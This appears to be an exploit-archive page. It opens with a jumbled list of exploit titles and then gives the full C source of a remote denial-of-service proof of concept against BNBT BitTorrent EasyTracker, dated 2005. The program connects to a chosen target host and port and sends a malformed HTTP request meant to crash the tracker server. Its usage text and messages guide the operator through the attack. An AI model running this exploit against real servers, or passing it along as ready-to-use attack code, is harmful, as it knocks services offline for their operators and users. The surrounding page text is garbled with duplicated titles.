
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
101 lines
2.6 KiB
C
Executable file
101 lines
2.6 KiB
C
Executable file
/* BNBT BitTorrent EasyTracker Remote Denial Of Service
|
|
|
|
Versions:
|
|
Version 7.7r3.2004.10.27 and below
|
|
|
|
Vendors:
|
|
http://bnbt.go-dedicated.com/
|
|
http://bnbteasytracker.sourceforge.net/
|
|
http://sourceforge.net/projects/bnbtusermods/
|
|
|
|
Bug find and coded by:
|
|
Sowhat@@secway@org
|
|
http://secway.org
|
|
|
|
This PoC will Crash the server.
|
|
*/
|
|
|
|
#include <winsock2.h>
|
|
#include <stdio.h>
|
|
|
|
#pragma comment(lib, "ws2_32.lib")
|
|
|
|
char exploit[] =
|
|
|
|
"GET /index.htm HTTP/1.0\r\n:\r\n\r\n";
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
WSADATA wsaData;
|
|
WORD wVersionRequested;
|
|
struct hostent *pTarget;
|
|
struct sockaddr_in sock;
|
|
char *target;
|
|
int port,bufsize;
|
|
SOCKET mysocket;
|
|
|
|
if (argc < 2)
|
|
{
|
|
printf(" ######################################################################\r\n");
|
|
printf(" # BNBT BitTorrent EasyTracker DoS by sowhat <sowhat@@secway@org> #\r\n", argv[0]);
|
|
printf(" # This exploit will Crash the Server #\r\n");
|
|
printf(" # http://www.secway.org #\r\n");
|
|
printf(" ######################################################################\r\n");
|
|
printf(" Usage:\r\n %s <targetip> [targetport] (default is 6969) \r\n", argv[0]);
|
|
printf(" Example:\r\n");
|
|
printf(" %s 1.1.1.1\r\n",argv[0]);
|
|
printf(" %s 1.1.1.1 8888\r\n",argv[0]);
|
|
exit(1);
|
|
}
|
|
|
|
wVersionRequested = MAKEWORD(1, 1);
|
|
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
|
|
|
|
target = argv[1];
|
|
port = 6969;
|
|
|
|
if (argc >= 3) port = atoi(argv[2]);
|
|
bufsize = 1024;
|
|
if (argc >= 4) bufsize = atoi(argv[3]);
|
|
|
|
mysocket = socket(AF_INET, SOCK_STREAM, 0);
|
|
if(mysocket==INVALID_SOCKET)
|
|
{
|
|
printf("Socket error!\r\n");
|
|
exit(1);
|
|
}
|
|
|
|
printf("Resolving Hostnames...\n");
|
|
if ((pTarget = gethostbyname(target)) == NULL)
|
|
{
|
|
printf("Resolve of %s failed\n", argv[1]);
|
|
exit(1);
|
|
}
|
|
|
|
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
|
|
sock.sin_family = AF_INET;
|
|
sock.sin_port = htons((USHORT)port);
|
|
|
|
printf("Connecting...\n");
|
|
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
|
|
{
|
|
printf("Couldn't connect to host.\n");
|
|
exit(1);
|
|
}
|
|
|
|
printf("Connected!...\n");
|
|
printf("Sending Payload...\n");
|
|
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
|
|
{
|
|
printf("Error Sending the Exploit Payload\r\n");
|
|
closesocket(mysocket);
|
|
exit(1);
|
|
}
|
|
|
|
printf("Payload has been sent! Check if the webserver is dead.\r\n");
|
|
closesocket(mysocket);
|
|
WSACleanup();
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2005-09-06]
|